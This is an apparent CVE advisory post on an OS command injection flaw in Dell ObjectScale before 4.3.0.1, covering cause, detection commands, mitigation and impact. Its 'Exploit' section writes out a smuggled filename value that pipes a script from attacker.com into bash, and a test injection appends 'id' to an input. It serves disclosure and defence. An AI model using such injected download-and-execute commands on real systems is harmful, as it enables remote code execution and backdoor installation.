Dell ObjectScale, OS Command Injection, CVE-2026-56685 (High) -DC-Aug2026-1643

Listen to this Post

CVE-2026-56685 is an OS command injection vulnerability identified in Dell ObjectScale, a software-defined object storage platform. The root cause is the improper neutralization of special elements used in an OS command, a weakness categorized under CWE-78. This flaw exists in all versions of ObjectScale prior to 4.3.0.1.
The vulnerability stems from a failure to properly sanitize user-supplied input before it is passed to the underlying operating system shell. When an application constructs a system command using unsanitized external input, an attacker can inject additional commands that the system will execute. In the context of ObjectScale, a low-privileged attacker with local access can exploit this by supplying crafted input to a vulnerable function or API endpoint. Because the application does not correctly neutralize special characters such as ;, |, &, or $(), the injected commands are interpreted by the shell alongside the intended command.
The attack vector is local, meaning the attacker must already have some level of access to the affected system—either through a compromised low-privilege account or physical presence. Once exploited, the injected commands execute with the privileges of the ObjectScale service account, which often runs with elevated permissions. This can lead to full system compromise, including data exfiltration, service disruption, and lateral movement within the network. The vulnerability is considered straightforward to exploit given the necessary local access.

DailyCVE Form:

Platform: Dell ObjectScale
Version: <4.3.0.1
Vulnerability: OS Command Injection
Severity: High (7.3)
Date: 2026-08-17

Prediction: Patch expected 2026-08-17

What Undercode Say:

Check ObjectScale version
dpkg -l | grep objectscale
rpm -qa | grep objectscale
Verify if system is vulnerable (requires local access)
Example: Test injection through a vulnerable parameter
curl -X POST "http://localhost:8080/vulnerable-endpoint" -d "input=test; id"
Check service account privileges
ps aux | grep objectscale
sudo -l
Monitor for suspicious command execution
ausearch -m execve -ts recent
journalctl -u objectscale.service -f

Exploit: (Educational Purposes!)

A low-privileged attacker with local access could exploit this vulnerability by injecting malicious commands into unsanitized input fields. For example, if ObjectScale processes a filename parameter without proper validation, an attacker could supply:

filename=document.pdf; curl http://attacker.com/backdoor.sh | bash

This would cause the system to execute both the intended file operation and the attacker’s remote payload. The injected commands run with the privileges of the ObjectScale service account. Due to the lack of input sanitization, the attacker can chain multiple commands to escalate privileges, install backdoors, or exfiltrate sensitive data.

Protection:

The primary and official fix is to upgrade Dell ObjectScale to version 4.3.0.1 or later. This version contains the necessary input validation patches to neutralize the injection vectors. The upgrade requires a system restart and should be scheduled during a maintenance window.
As a temporary workaround until the patch can be applied, restrict local access to ObjectScale nodes to only trusted administrators. Enforce strong authentication and monitor for unauthorized access attempts. Additionally, apply the principle of least privilege by ensuring service accounts and users have only the minimum necessary permissions. Remove unnecessary sudo rights and restrict command execution where possible.

Impact:

Successful exploitation of CVE-2026-56685 allows a low-privileged attacker with local access to execute arbitrary commands on the underlying operating system. This compromises the confidentiality, integrity, and availability of the affected system. An attacker could escalate privileges to root, gain persistent control of the ObjectScale node, pivot to other systems, and cause data exfiltration or destruction. While ObjectScale is typically deployed on-premises and not directly internet-facing, the internal risk is high, as any user with local access—such as a compromised service account or malicious insider—can exploit this flaw. The CVSS score of 7.3 classifies this as a high-severity vulnerability.
